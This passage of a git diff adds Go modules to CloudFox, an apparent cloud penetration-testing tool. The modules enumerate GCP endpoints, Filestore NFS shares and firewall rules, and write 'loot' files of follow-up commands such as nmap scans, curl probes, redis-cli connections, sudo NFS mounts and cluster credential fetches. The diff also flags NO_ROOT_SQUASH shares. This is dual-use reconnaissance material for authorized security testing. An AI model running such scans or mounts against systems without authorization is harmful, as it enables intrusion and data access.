dataprocservice.New() + clusters, err := ds.ListClusters(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list Dataproc clusters in project %s", projectID)) + return + } + + for _, cluster := range clusters { + // Master nodes - these are the main SSH/Spark/HDFS entry points + security := "" + if !cluster.InternalIPOnly { + security = "External IPs Enabled" + } + + ep := Endpoint{ + ProjectID: 
projectID, + Name: cluster.Name + "-master", + Type: "Dataproc Master", + Protocol: "TCP", + Port: "22,8088,9870,8080", + ResourceType: "DataprocCluster", + Region: cluster.Region, + Status: cluster.State, + ServiceAccount: cluster.ServiceAccount, + IsExternal: !cluster.InternalIPOnly, + Network: cluster.Network, + Security: security, + } + m.addEndpoint(projectID, ep) + } +} + +// getNotebookInstances retrieves Vertex AI Notebook instances +func (m *EndpointsModule) getNotebookInstances(ctx context.Context, projectID string, logger internal.Logger) { + ns := notebooksservice.New() + instances, err := ns.ListInstances(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list Notebook instances in project %s", projectID)) + return + } + + for _, instance := range instances { + if instance.ProxyUri != "" { + hostname := strings.TrimPrefix(instance.ProxyUri, "https://") + security := "" + if !instance.NoPublicIP { + security = "Public IP Enabled" + } + if instance.NoProxyAccess { + security = "Proxy Access Disabled" + } + + ep := Endpoint{ + ProjectID: projectID, + Name: instance.Name, + Type: "Vertex AI Notebook", + Hostname: hostname, + Protocol: "HTTPS", + Port: "443", + ResourceType: "Notebook", + Region: instance.Location, + Status: instance.State, + ServiceAccount: instance.ServiceAccount, + TLSEnabled: true, + IsExternal: !instance.NoPublicIP, + Network: instance.Network, + Security: security, + } + m.addEndpoint(projectID, ep) + } + } +} + +// getPubSubPushEndpoints retrieves Pub/Sub push subscription endpoints +func (m *EndpointsModule) getPubSubPushEndpoints(ctx context.Context, projectID string, logger internal.Logger) { + ps := pubsubservice.New() + subscriptions, err := ps.Subscriptions(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list Pub/Sub subscriptions in project %s", projectID)) + return + } + + for _, sub := range subscriptions { 
+ if sub.PushEndpoint != "" { + hostname := sub.PushEndpoint + hostname = strings.TrimPrefix(hostname, "https://") + hostname = strings.TrimPrefix(hostname, "http://") + if idx := strings.Index(hostname, "/"); idx != -1 { + hostname = hostname[:idx] + } + + ep := Endpoint{ + ProjectID: projectID, + Name: sub.Name, + Type: "Pub/Sub Push", + Hostname: hostname, + Protocol: "HTTPS", + Port: "443", + Resource: sub.Topic, + ResourceType: "PubSubSubscription", + ServiceAccount: sub.PushServiceAccount, + TLSEnabled: strings.HasPrefix(sub.PushEndpoint, "https://"), + IsExternal: true, + } + m.addEndpoint(projectID, ep) + } + } +} + +// analyzeFirewallRules analyzes firewall rules and builds port mapping +func (m *EndpointsModule) analyzeFirewallRules(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { + req := svc.Firewalls.List(projectID) + if err := req.Pages(ctx, func(page *compute.FirewallList) error { + for _, fw := range page.Items { + if fw.Direction != "INGRESS" { + continue + } + + networkName := extractResourceName(fw.Network) + + var rulePorts []string + for _, allowed := range fw.Allowed { + if len(allowed.Ports) == 0 { + rulePorts = append(rulePorts, "ALL") + } else { + rulePorts = append(rulePorts, allowed.Ports...) + } + } + + m.mu.Lock() + if len(fw.TargetTags) == 0 { + m.firewallPortMap[networkName] = append(m.firewallPortMap[networkName], rulePorts...) + } else { + for _, tag := range fw.TargetTags { + key := fmt.Sprintf("%s:%s", networkName, tag) + m.firewallPortMap[key] = append(m.firewallPortMap[key], rulePorts...) 
+ } + } + m.mu.Unlock() + } + return nil + }); err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list firewall rules in project %s", projectID)) + } +} + +// addEndpoint adds an endpoint thread-safely +func (m *EndpointsModule) addEndpoint(projectID string, ep Endpoint) { + m.mu.Lock() + m.ProjectEndpoints[projectID] = append(m.ProjectEndpoints[projectID], ep) + m.mu.Unlock() +} + +// ------------------------------ +// Helper Functions +// ------------------------------ +func extractResourceName(url string) string { + if url == "" { + return "" + } + parts := strings.Split(url, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return url +} + +func extractRegionFromScope(scope string) string { + parts := strings.Split(scope, "/") + if len(parts) >= 2 { + return parts[len(parts)-1] + } + return scope +} + +func extractZoneFromScope(scope string) string { + parts := strings.Split(scope, "/") + if len(parts) >= 2 { + return parts[len(parts)-1] + } + return scope +} + +// ------------------------------ +// Loot File Management +// ------------------------------ + +// generateLootFiles creates the loot files for a project, grouped by network/region +func (m *EndpointsModule) generateLootFiles(projectID string) []internal.LootFile { + endpoints, ok := m.ProjectEndpoints[projectID] + if !ok || len(endpoints) == 0 { + return nil + } + + // Separate external and internal endpoints + var externalEndpoints, internalEndpoints []Endpoint + for _, ep := range endpoints { + if ep.IsExternal { + externalEndpoints = append(externalEndpoints, ep) + } else { + internalEndpoints = append(internalEndpoints, ep) + } + } + + var lootFiles []internal.LootFile + + // Generate external commands file + if len(externalEndpoints) > 0 { + lootFiles = append(lootFiles, internal.LootFile{ + Name: "endpoints-external-commands", + Contents: m.generateGroupedCommands(externalEndpoints, true), + }) + } + + // Generate internal commands file + if 
len(internalEndpoints) > 0 { + lootFiles = append(lootFiles, internal.LootFile{ + Name: "endpoints-internal-commands", + Contents: m.generateGroupedCommands(internalEndpoints, false), + }) + } + + return lootFiles +} + +// generateGroupedCommands creates commands grouped by network +func (m *EndpointsModule) generateGroupedCommands(endpoints []Endpoint, isExternal bool) string { + var contents strings.Builder + + if isExternal { + contents.WriteString("# External Endpoint Scan Commands\n") + contents.WriteString("# Generated by CloudFox\n") + contents.WriteString("# These endpoints are internet-facing\n\n") + } else { + contents.WriteString("# Internal Endpoint Scan Commands\n") + contents.WriteString("# Generated by CloudFox\n") + contents.WriteString("# These endpoints require internal network access (VPN, bastion, etc.)\n\n") + } + + // Group endpoints by network (same VPC = same firewall rules) + groups := make(map[string][]Endpoint) + var groupOrder []string + + for _, ep := range endpoints { + network := ep.Network + if network == "" { + network = "default" + } + if _, exists := groups[network]; !exists { + groupOrder = append(groupOrder, network) + } + groups[network] = append(groups[network], ep) + } + + // Generate commands for each network group + for _, network := range groupOrder { + groupEndpoints := groups[network] + + contents.WriteString(fmt.Sprintf("# =============================================================================\n")) + contents.WriteString(fmt.Sprintf("# Network: %s\n", network)) + contents.WriteString(fmt.Sprintf("# =============================================================================\n\n")) + + // Generate commands for each endpoint in the group + for _, ep := range groupEndpoints { + m.writeEndpointCommand(&contents, ep) + } + } + + return contents.String() +} + +// writeEndpointCommand writes the command for a single endpoint +func (m *EndpointsModule) writeEndpointCommand(contents *strings.Builder, ep Endpoint) { + // 
Determine best target for scanning + target := ep.ExternalIP + if target == "" { + target = ep.InternalIP + } + if target == "" { + target = ep.Hostname + } + if target == "" { + return + } + + // Write endpoint header (just type and name) + contents.WriteString(fmt.Sprintf("# %s: %s\n", ep.Type, ep.Name)) + + // Generate appropriate commands based on type + switch ep.Type { + case "Cloud Run", "Cloud Function", "Composer Airflow", "App Engine", "Vertex AI Notebook": + if ep.Hostname != "" { + contents.WriteString(fmt.Sprintf("curl -v https://%s\n\n", ep.Hostname)) + } + case "GKE API": + contents.WriteString(fmt.Sprintf("gcloud container clusters get-credentials %s --region=%s --project=%s\n", ep.Name, ep.Region, ep.ProjectID)) + contents.WriteString("kubectl cluster-info\n\n") + case "Cloud SQL": + protocol := "mysql" + if strings.Contains(ep.Port, "5432") { + protocol = "psql" + } else if strings.Contains(ep.Port, "1433") { + protocol = "sqlcmd" + } + contents.WriteString(fmt.Sprintf("# %s -h %s -P %s -u USERNAME\n", protocol, target, ep.Port)) + contents.WriteString(fmt.Sprintf("nmap -sV -Pn -p %s %s\n\n", ep.Port, target)) + case "Redis": + contents.WriteString(fmt.Sprintf("redis-cli -h %s -p %s\n", target, ep.Port)) + contents.WriteString(fmt.Sprintf("nmap -sV -Pn -p %s %s\n\n", ep.Port, target)) + case "Filestore NFS": + contents.WriteString(fmt.Sprintf("showmount -e %s\n", target)) + contents.WriteString(fmt.Sprintf("sudo mount -t nfs %s:/ /mnt/\n\n", target)) + case "Dataproc Master": + contents.WriteString(fmt.Sprintf("gcloud compute ssh %s --project=%s --zone=\n", strings.TrimSuffix(ep.Name, "-master"), ep.ProjectID)) + contents.WriteString("# Web UIs: YARN (8088), HDFS (9870), Spark (8080)\n\n") + case "VPN Gateway", "HA VPN Gateway": + contents.WriteString(fmt.Sprintf("# VPN Gateway IP: %s (ports 500/UDP, 4500/UDP, ESP)\n", target)) + contents.WriteString(fmt.Sprintf("nmap -sU -Pn -p 500,4500 %s\n\n", target)) + case "Pub/Sub Push": + 
contents.WriteString(fmt.Sprintf("curl -v https://%s\n\n", ep.Hostname)) + default: + if ep.Port == "ALL" || ep.Port == "" { + contents.WriteString(fmt.Sprintf("nmap -sV -Pn %s\n", target)) + } else { + contents.WriteString(fmt.Sprintf("nmap -sV -Pn -p %s %s\n", ep.Port, target)) + } + if ep.TLSEnabled || ep.Port == "443" { + contents.WriteString(fmt.Sprintf("curl -vk https://%s/\n", target)) + } + contents.WriteString("\n") + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *EndpointsModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *EndpointsModule) getHeader() []string { + return []string{ + "Project", + "Name", + "Type", + "Exposure", + "External IP", + "Internal IP", + "Hostname", + "Protocol", + "Port", + "Region", + "Network", + "Security", + "Status", + } +} + +func (m *EndpointsModule) endpointsToTableBody(endpoints []Endpoint) [][]string { + var body [][]string + for _, ep := range endpoints { + exposure := "Internal" + if ep.IsExternal { + exposure = "External" + } + + externalIP := ep.ExternalIP + if externalIP == "" { + externalIP = "-" + } + + internalIP := ep.InternalIP + if internalIP == "" { + internalIP = "-" + } + + hostname := ep.Hostname + if hostname == "" { + hostname = "-" + } + + security := ep.Security + if security == "" { + security = "-" + } + + status := ep.Status + if status == "" { + status = "-" + } + + network := ep.Network + if network == "" { + network = "-" + } + + body = append(body, []string{ + m.GetProjectName(ep.ProjectID), + ep.Name, + ep.Type, + exposure, + externalIP, + internalIP, + hostname, + ep.Protocol, + ep.Port, + ep.Region, + network, + security, + status, + }) + } + return body +} + +func (m *EndpointsModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles 
[]internal.TableFile + + if endpoints, ok := m.ProjectEndpoints[projectID]; ok && len(endpoints) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "endpoints", + Header: m.getHeader(), + Body: m.endpointsToTableBody(endpoints), + }) + } + + return tableFiles +} + +func (m *EndpointsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID := range m.ProjectEndpoints { + tableFiles := m.buildTablesForProject(projectID) + lootFiles := m.generateLootFiles(projectID) + + outputData.ProjectLevelData[projectID] = EndpointsOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), "endpoints") + } +} + +func (m *EndpointsModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allEndpoints := m.getAllEndpoints() + + var tables []internal.TableFile + + if len(allEndpoints) > 0 { + tables = append(tables, internal.TableFile{ + Name: "endpoints", + Header: m.getHeader(), + Body: m.endpointsToTableBody(allEndpoints), + }) + } + + // Generate loot files from all endpoints combined + var lootFiles []internal.LootFile + if len(allEndpoints) > 0 { + // Separate external and internal endpoints + var externalEndpoints, internalEndpoints []Endpoint + for _, ep := range allEndpoints { + if ep.IsExternal { + externalEndpoints = append(externalEndpoints, ep) + } else { + internalEndpoints = append(internalEndpoints, ep) + } + } + + if len(externalEndpoints) > 0 { + lootFiles = append(lootFiles, internal.LootFile{ + Name: "endpoints-external-commands", + Contents: m.generateGroupedCommands(externalEndpoints, 
true), + }) + } + if len(internalEndpoints) > 0 { + lootFiles = append(lootFiles, internal.LootFile{ + Name: "endpoints-internal-commands", + Contents: m.generateGroupedCommands(internalEndpoints, false), + }) + } + } + + output := EndpointsOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), "endpoints") + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/filestore.go b/gcp/commands/filestore.go new file mode 100644 index 00000000..374e67de --- /dev/null +++ b/gcp/commands/filestore.go @@ -0,0 +1,400 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + filestoreservice "github.com/BishopFox/cloudfox/gcp/services/filestoreService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPFilestoreCommand = &cobra.Command{ + Use: globals.GCP_FILESTORE_MODULE_NAME, + Aliases: []string{"nfs", "files"}, + Short: "Enumerate Filestore NFS instances", + Long: `Enumerate Filestore instances and their file shares.`, + Run: runGCPFilestoreCommand, +} + +type FilestoreModule struct { + gcpinternal.BaseGCPModule + ProjectInstances map[string][]filestoreservice.FilestoreInstanceInfo // projectID -> instances + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +type FilestoreOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o FilestoreOutput) TableFiles() []internal.TableFile { return o.Table } +func (o FilestoreOutput) LootFiles() []internal.LootFile { return 
o.Loot } + +func runGCPFilestoreCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_FILESTORE_MODULE_NAME) + if err != nil { + return + } + + module := &FilestoreModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectInstances: make(map[string][]filestoreservice.FilestoreInstanceInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *FilestoreModule) getAllInstances() []filestoreservice.FilestoreInstanceInfo { + var all []filestoreservice.FilestoreInstanceInfo + for _, instances := range m.ProjectInstances { + all = append(all, instances...) + } + return all +} + +func (m *FilestoreModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_FILESTORE_MODULE_NAME, m.processProject) + + allInstances := m.getAllInstances() + if len(allInstances) == 0 { + logger.InfoM("No Filestore instances found", globals.GCP_FILESTORE_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d Filestore instance(s)", len(allInstances)), globals.GCP_FILESTORE_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *FilestoreModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["filestore-commands"] = &internal.LootFile{ + Name: "filestore-commands", + Contents: "# Filestore Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + m.mu.Unlock() + + svc := filestoreservice.New() + instances, err := svc.ListInstances(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_FILESTORE_MODULE_NAME, + fmt.Sprintf("Could not enumerate Filestore instances in project %s", 
projectID)) + return + } + + m.mu.Lock() + m.ProjectInstances[projectID] = instances + for _, instance := range instances { + m.addToLoot(projectID, instance) + } + m.mu.Unlock() +} + +func (m *FilestoreModule) addToLoot(projectID string, instance filestoreservice.FilestoreInstanceInfo) { + lootFile := m.LootMap[projectID]["filestore-commands"] + if lootFile == nil { + return + } + // Determine protocol display name + protocol := instance.Protocol + if protocol == "" { + protocol = "NFS_V3" // Default + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# Instance: %s\n"+ + "# =============================================================================\n"+ + "# Location: %s\n"+ + "# Project: %s\n"+ + "# Protocol: %s\n"+ + "# Tier: %s\n"+ + "# Network: %s\n"+ + "# IP(s): %s\n\n", + instance.Name, + instance.Location, + instance.ProjectID, + protocol, + instance.Tier, + instance.Network, + strings.Join(instance.IPAddresses, ", "), + ) + + // gcloud describe command + lootFile.Contents += fmt.Sprintf( + "# Describe instance:\n"+ + "gcloud filestore instances describe %s --location=%s --project=%s\n\n", + instance.Name, instance.Location, instance.ProjectID, + ) + + // Mount commands for each share + if len(instance.Shares) > 0 && len(instance.IPAddresses) > 0 { + for _, share := range instance.Shares { + lootFile.Contents += fmt.Sprintf( + "# -----------------------------------------------------------------------------\n"+ + "# Share: %s (%d GB)\n"+ + "# -----------------------------------------------------------------------------\n", + share.Name, share.CapacityGB, + ) + + // Show NFS export options if present + if len(share.NfsExportOptions) > 0 { + lootFile.Contents += "# NFS Export Options:\n" + for _, opt := range share.NfsExportOptions { + ipRanges := strings.Join(opt.IPRanges, ", ") + if ipRanges == "" { + ipRanges = "all" + } + lootFile.Contents += fmt.Sprintf( + "# IP Ranges: 
%s\n"+ + "# Access: %s\n"+ + "# Squash: %s\n", + ipRanges, + opt.AccessMode, + opt.SquashMode, + ) + if opt.SquashMode == "NO_ROOT_SQUASH" { + lootFile.Contents += "# [!] NO_ROOT_SQUASH - root access preserved!\n" + } + } + lootFile.Contents += "\n" + } + + // Generate mount commands based on protocol + for _, ip := range instance.IPAddresses { + lootFile.Contents += "# Mount commands (run as root):\n" + + switch protocol { + case "NFS_V4_1": + // NFSv4.1 mount command + lootFile.Contents += fmt.Sprintf( + "# NFSv4.1 mount:\n"+ + "sudo mkdir -p /mnt/%s\n"+ + "sudo mount -t nfs -o vers=4.1 %s:/%s /mnt/%s\n"+ + "# With Kerberos (if configured):\n"+ + "# sudo mount -t nfs -o vers=4.1,sec=krb5p %s:/%s /mnt/%s\n\n", + share.Name, + ip, share.Name, share.Name, + ip, share.Name, share.Name, + ) + default: // NFS_V3 or empty + // NFSv3 mount command + lootFile.Contents += fmt.Sprintf( + "# NFSv3 mount:\n"+ + "sudo mkdir -p /mnt/%s\n"+ + "sudo mount -t nfs -o vers=3 %s:/%s /mnt/%s\n\n", + share.Name, + ip, share.Name, share.Name, + ) + } + + // List contents after mounting + lootFile.Contents += fmt.Sprintf( + "# After mounting, list contents:\n"+ + "ls -la /mnt/%s\n"+ + "# Check disk usage:\n"+ + "df -h /mnt/%s\n\n", + share.Name, share.Name, + ) + + // Unmount command + lootFile.Contents += fmt.Sprintf( + "# Unmount when done:\n"+ + "sudo umount /mnt/%s\n\n", + share.Name, + ) + } + } + } +} + +func (m *FilestoreModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *FilestoreModule) getHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Name", + "Location", + "Tier", + "Protocol", + "Network", + "IP", + "Shares", + "Access", + "Security", + "State", + } +} + +func (m *FilestoreModule) instancesToTableBody(instances []filestoreservice.FilestoreInstanceInfo) [][]string { + var body [][]string + 
for _, instance := range instances { + var shareNames []string + var accessModes []string + hasNoRootSquash := false + + for _, share := range instance.Shares { + shareNames = append(shareNames, fmt.Sprintf("%s (%dGB)", share.Name, share.CapacityGB)) + for _, opt := range share.NfsExportOptions { + if opt.AccessMode != "" { + accessModes = append(accessModes, opt.AccessMode) + } + if opt.SquashMode == "NO_ROOT_SQUASH" { + hasNoRootSquash = true + } + } + } + + ip := strings.Join(instance.IPAddresses, ", ") + if ip == "" { + ip = "-" + } + + shares := strings.Join(shareNames, ", ") + if shares == "" { + shares = "-" + } + + network := instance.Network + if network == "" { + network = "-" + } + + protocol := instance.Protocol + if protocol == "" { + protocol = "NFS_V3" + } + + // Deduplicate and format access modes + access := "-" + if len(accessModes) > 0 { + uniqueAccess := make(map[string]bool) + for _, a := range accessModes { + uniqueAccess[a] = true + } + var accessList []string + for a := range uniqueAccess { + accessList = append(accessList, a) + } + access = strings.Join(accessList, ", ") + } + + // Security findings + security := "OK" + if hasNoRootSquash { + security = "NO_ROOT_SQUASH" + } + + body = append(body, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, + instance.Name, + instance.Location, + instance.Tier, + protocol, + network, + ip, + shares, + access, + security, + instance.State, + }) + } + return body +} + +func (m *FilestoreModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if instances, ok := m.ProjectInstances[projectID]; ok && len(instances) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "filestore", + Header: m.getHeader(), + Body: m.instancesToTableBody(instances), + }) + } + + return tableFiles +} + +func (m *FilestoreModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := 
internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID := range m.ProjectInstances { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = FilestoreOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_FILESTORE_MODULE_NAME) + } +} + +func (m *FilestoreModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allInstances := m.getAllInstances() + + var tables []internal.TableFile + + if len(allInstances) > 0 { + tables = append(tables, internal.TableFile{ + Name: "filestore", + Header: m.getHeader(), + Body: m.instancesToTableBody(allInstances), + }) + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := FilestoreOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) +} diff --git a/gcp/commands/firewall.go 
b/gcp/commands/firewall.go new file mode 100644 index 00000000..10c541f4 --- /dev/null +++ b/gcp/commands/firewall.go @@ -0,0 +1,666 @@ +package commands + +import ( + "github.com/BishopFox/cloudfox/gcp/shared" + "context" + "fmt" + "strings" + "sync" + + diagramservice "github.com/BishopFox/cloudfox/gcp/services/diagramService" + NetworkService "github.com/BishopFox/cloudfox/gcp/services/networkService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPFirewallCommand = &cobra.Command{ + Use: globals.GCP_FIREWALL_MODULE_NAME, + Aliases: []string{"fw", "firewall-rules", "network-security"}, + Short: "Enumerate VPC networks and firewall rules with security analysis", + Long: `Enumerate VPC networks, subnets, and firewall rules across projects with security analysis. + +Features: +- Lists all VPC networks and their peering relationships +- Shows all subnets with CIDR ranges and configurations +- Enumerates firewall rules with security risk analysis +- Identifies overly permissive rules (0.0.0.0/0 ingress) +- Detects exposed sensitive ports (SSH, RDP, databases) +- Generates gcloud commands for remediation + +Security Columns: +- Risk: HIGH, MEDIUM, LOW based on exposure analysis +- Direction: INGRESS or EGRESS +- Source: Source IP ranges (0.0.0.0/0 = internet) +- Ports: Allowed ports and protocols +- Issues: Detected security misconfigurations + +Attack Surface: +- 0.0.0.0/0 ingress allows internet access to resources +- All ports allowed means no port restrictions +- No target tags means rule applies to ALL instances +- VPC peering may expose internal resources`, + Run: runGCPFirewallCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type FirewallModule struct { + gcpinternal.BaseGCPModule + + // Per-project data for hierarchical output + ProjectNetworks 
map[string][]NetworkService.VPCInfo + ProjectSubnets map[string][]NetworkService.SubnetInfo + ProjectFirewallRules map[string][]NetworkService.FirewallRuleInfo + LootMap map[string]map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type FirewallOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o FirewallOutput) TableFiles() []internal.TableFile { return o.Table } +func (o FirewallOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPFirewallCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_FIREWALL_MODULE_NAME) + if err != nil { + return + } + + module := &FirewallModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectNetworks: make(map[string][]NetworkService.VPCInfo), + ProjectSubnets: make(map[string][]NetworkService.SubnetInfo), + ProjectFirewallRules: make(map[string][]NetworkService.FirewallRuleInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *FirewallModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_FIREWALL_MODULE_NAME, m.processProject) + + // Get all data for stats + allNetworks := m.getAllNetworks() + allSubnets := m.getAllSubnets() + allRules := m.getAllFirewallRules() + + if len(allRules) == 0 && len(allNetworks) == 0 { + logger.InfoM("No networks or firewall rules found", globals.GCP_FIREWALL_MODULE_NAME) + return + } + + // Count public ingress rules and peerings + publicIngressCount := 0 + for _, rule := range allRules { + if rule.IsPublicIngress { + publicIngressCount++ + } + } + + 
peeringCount := 0 + for _, network := range allNetworks { + peeringCount += len(network.Peerings) + } + + msg := fmt.Sprintf("Found %d network(s), %d subnet(s), %d firewall rule(s)", + len(allNetworks), len(allSubnets), len(allRules)) + if publicIngressCount > 0 { + msg += fmt.Sprintf(" [%d public ingress]", publicIngressCount) + } + if peeringCount > 0 { + msg += fmt.Sprintf(" [%d peerings]", peeringCount) + } + logger.SuccessM(msg, globals.GCP_FIREWALL_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// getAllNetworks returns all networks from all projects +func (m *FirewallModule) getAllNetworks() []NetworkService.VPCInfo { + var all []NetworkService.VPCInfo + for _, networks := range m.ProjectNetworks { + all = append(all, networks...) + } + return all +} + +// getAllSubnets returns all subnets from all projects +func (m *FirewallModule) getAllSubnets() []NetworkService.SubnetInfo { + var all []NetworkService.SubnetInfo + for _, subnets := range m.ProjectSubnets { + all = append(all, subnets...) + } + return all +} + +// getAllFirewallRules returns all firewall rules from all projects +func (m *FirewallModule) getAllFirewallRules() []NetworkService.FirewallRuleInfo { + var all []NetworkService.FirewallRuleInfo + for _, rules := range m.ProjectFirewallRules { + all = append(all, rules...) 
+ } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *FirewallModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating networks and firewall in project: %s", projectID), globals.GCP_FIREWALL_MODULE_NAME) + } + + ns := NetworkService.New() + + // Initialize loot for this project + m.mu.Lock() + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["firewall-commands"] = &internal.LootFile{ + Name: "firewall-commands", + Contents: "# Firewall Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + m.mu.Unlock() + + var networks []NetworkService.VPCInfo + var subnets []NetworkService.SubnetInfo + var rules []NetworkService.FirewallRuleInfo + + // Get networks + var err error + networks, err = ns.Networks(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_FIREWALL_MODULE_NAME, + fmt.Sprintf("Could not enumerate networks in project %s", projectID)) + } + + // Get subnets + subnets, err = ns.Subnets(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_FIREWALL_MODULE_NAME, + fmt.Sprintf("Could not enumerate subnets in project %s", projectID)) + } + + // Get firewall rules + rules, err = ns.FirewallRulesEnhanced(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_FIREWALL_MODULE_NAME, + fmt.Sprintf("Could not enumerate firewall rules in project %s", projectID)) + } + + // Thread-safe store per-project + m.mu.Lock() + m.ProjectNetworks[projectID] = networks + m.ProjectSubnets[projectID] = subnets + 